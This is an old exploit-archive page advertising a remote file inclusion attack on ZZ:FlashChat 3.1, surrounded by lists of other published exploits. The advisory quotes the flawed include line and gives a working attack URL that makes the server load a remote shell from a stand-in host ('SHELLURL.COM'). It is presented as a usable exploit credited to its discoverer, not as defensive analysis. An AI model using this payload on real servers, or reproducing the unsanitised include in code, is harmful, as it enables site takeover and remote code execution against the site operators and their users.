exploits , vulnerabilities , articles , ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability

2007-04-13 Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit
2007-03-17 MPM Chat 2.5 (view.php logi) Local File Include Vulnerability
2007-03-07 Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability
2006-09-04 FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
2006-08-07 XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)

2006-08-19

ZZ:FlashChat <= 3.1 (adminlog) Remote File Incude Vulnerability

Rated as : High Risk

#==============================================================================================
#ZZ:FlashChat <= V3.1 (adminlog) Remote File Inclusion Exploit
#===============================================================================================
#                                                                         
  
#Critical Level : Dangerous                                               
  
#                                                                         
  
#Venedor site : http://download.zehnet.de             
#                                                                         
   
#Version : V3.1                                                  
#                                                               
#
#================================================================================================
#
#Bug in : chat/inc/func.add_data.php
#
#Vlu Code :
#--------------------------------
#
#  if($cfg['autolink']==1){	
#		include($adminlog.'./inc/func.autolink.php'); 
#  }
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/chat/inc/func.add_data.php?cfg[autolink]=1&adminlog=http://SHELLURL.COM?
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)
==================================================================================================
securitydot.net - 2006-08-19

Exploits - newest 10 RSS | More

2007-06-15 55514 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32859 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 40905 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28520 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19078 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16131 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18744 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16023 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32689 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16650 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit